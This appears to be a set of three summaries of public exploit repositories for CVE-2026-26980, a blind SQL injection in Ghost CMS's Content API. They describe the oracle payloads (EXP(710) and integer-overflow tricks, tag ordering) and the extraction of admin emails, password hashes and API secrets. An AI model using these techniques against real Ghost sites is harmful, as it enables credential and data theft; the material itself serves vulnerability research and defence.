SQL Injection in Ghost Content API

This repository is a self-contained exploit lab and PoC for CVE-2026-26980, an unauthenticated SQL injection in TryGhost Ghost CMS Content API filter handling. The repo contains a Docker-based environment that installs Ghost 6.19.0, seeds a SQLite database with a known public Content API key and oracle tags, and a Python exploit script that abuses the public /ghost/api/content/tags/ endpoint. Repository structure: Dockerfile builds a vulnerable Ghost 6.19.0 lab on port 9102; docker-entrypoint.sh starts Ghost, waits for readiness, and seeds the database with branding, a fake flag table, a static content API key, and two public tags (bacon/chorizo) used as an oracle; patch-source-theme.sh modifies the default Ghost theme for lab branding; poc.py is the main exploit. README.md documents the vulnerability, setup, and usage. Main exploit behavior in poc.py: it sends GET requests to /ghost/api/content/tags/?key=<key>&filter=<payload>, where the filter is crafted by condition_filter() to inject SQL into the slug:[...] ordering logic. The exploit uses the relative order of returned tags as a boolean oracle: if the injected condition is true, bacon appears first; if false, chorizo appears first. On top of this primitive, the script implements value_length() and count_rows() using binary search, and recover_value_by_prefix() for character-by-character extraction. It targets users, settings, and api_keys tables and demonstrates extraction of admin email, admin name, admin API key ID, and admin API secret. This is a real exploit PoC rather than a detector. It does not attempt code execution; its capability is database enumeration and arbitrary value extraction via blind boolean SQLi over a public unauthenticated web endpoint, provided a public Content API key is available.

This repository is a self-contained lab and operational PoC for CVE-2026-26980, an unauthenticated blind SQL injection in Ghost CMS Content API slug filter ordering. The repo contains 5 files: a detailed README, docker-compose.yml to launch vulnerable Ghost 6.18.0 and fixed Ghost 6.19.1 with MySQL 8, exploit.py as the main Python exploit, requirements.txt listing requests, and validate.sh for end-to-end validation. The exploit is not tied to a common framework. The main capability is unauthenticated arbitrary database read from affected Ghost instances by abusing the public Content API key and injecting SQL through slug array ordering. The Python script automates target readiness checks, optional Ghost setup/login for the local lab, retrieval or use of a Content API key, verification of the boolean oracle, and blind extraction of sensitive values. The oracle relies on a crafted slug payload using CASE WHEN ... THEN 0 ELSE EXP(710) END so that true conditions return HTTP 200 and false conditions trigger HTTP 500 due to MySQL overflow. The script can extract the admin email by default and optionally the admin bcrypt hash and admin API secret. It also includes a validation mode to confirm the fix on patched versions. Repository structure and purpose: README.md explains the vulnerability, affected/fixed versions, exploitation method, and usage examples. docker-compose.yml provisions two Ghost environments for testing: vulnerable on localhost:2368 and fixed on localhost:2369, each backed by MySQL 8. exploit.py is the primary entry point and contains the exploit logic, CLI, hardcoded lab credentials, and HTTP interactions with Ghost admin and content API endpoints. validate.sh installs dependencies, starts both containers, runs the exploit against the vulnerable instance, validates the fix against the patched instance, and optionally tears down the lab. Overall, this is a real exploit PoC with practical extraction capability rather than a simple detector. It targets Ghost CMS versions prior to 6.19.1 and demonstrates blind SQLi-based database disclosure over HTTP.

This repository is a small standalone Python exploit for CVE-2026-26980, described as an unauthenticated SQL injection in Ghost CMS's public Content API leading to arbitrary database reads. The repository contains five files: a GPL license, a README with usage and lab instructions, the main exploit script (`main.py`), a minimal dependency file (`requirements.py`, though it is named like a Python file rather than `requirements.txt`), and a Docker Compose lab for Ghost 6.16.1 with MariaDB. The core logic is entirely in `main.py`. The exploit first requests the target homepage and scrapes `data-key` and `data-api` values from the HTML. It then queries the public `tags` API endpoint to obtain a valid tag slug and ID, which are used to construct a vulnerable `filter=slug:[...]` request template. The injection is implemented as a blind boolean oracle that intentionally triggers database errors when a tested condition is true. For SQLite it uses integer overflow via `abs(-9223372036854775808)`, and for MySQL it uses `exp(710)`. The script detects success by searching the HTTP response body for `badrequesterror` or `InternalServerError`. Using this oracle, the exploit performs bitwise length inference and binary-search character extraction. It supports concurrent extraction with a thread pool to speed up blind exfiltration. In default mode it performs reconnaissance against common Ghost tables (`users`, `members`, `api_keys`, `sessions`) and extracts high-value secrets including the first admin email, admin name, password hash, admin API key ID, and admin API secret. In table-dump mode, it can enumerate record counts and dump arbitrary rows from a specified table. For SQLite, it additionally queries `sqlite_master` to recover schema SQL and infer column names; for MySQL, column handling is more heuristic and defaults to common fields. The exploit is operational rather than a mere proof of concept because it contains end-to-end discovery, oracle calibration, multithreaded extraction, and table dumping functionality. It is not part of a larger exploit framework. One code-quality issue is that `main.py` references `textwrap.dedent` in the CLI epilog but does not import `textwrap`, which would cause a runtime error unless corrected. Despite that bug, the intended exploit behavior and capabilities are clear from the code.